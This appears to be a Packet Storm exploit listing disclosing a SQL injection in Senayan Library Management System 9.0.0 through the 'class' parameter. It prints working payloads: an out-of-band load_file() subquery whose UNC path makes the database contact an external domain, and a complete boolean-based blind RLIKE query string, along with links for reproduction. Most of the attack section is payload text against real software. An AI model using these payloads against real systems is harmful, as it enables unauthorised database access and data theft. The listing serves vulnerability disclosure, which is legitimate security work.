Lucene search

K
packetstormNu11secur1tyPACKETSTORM:170184
HistoryDec 10, 2022 - 12:00 a.m.

Senayan Library Management System 9.0.0 SQL Injection

2022-12-1000:00:00
nu11secur1ty
packetstormsecurity.com
232
senayan library management system
sql injection
remote attackers
arbitrary sql commands
high vulnerability
manual insertion
payload
reproduce
proof and exploit
`## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi  
## Author: nu11secur1ty  
## Date: 11.09.2022  
## Vendor: https://slims.web.id/web/  
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi  
  
## Description:  
The manual insertion `point 3` with `class` parameter appears to be  
vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'  
was submitted in the manual insertion point 3.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
  
## STATUS: HIGH Vulnerability  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: class (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT  
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND  
'dLjf'='dLjf&membershipType=a&collType=aaaa  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)  
  
## Proof and Exploit:  
[href](http://localhost:5001/sy5wji)  
  
## Time spent  
`03:00:00`  
`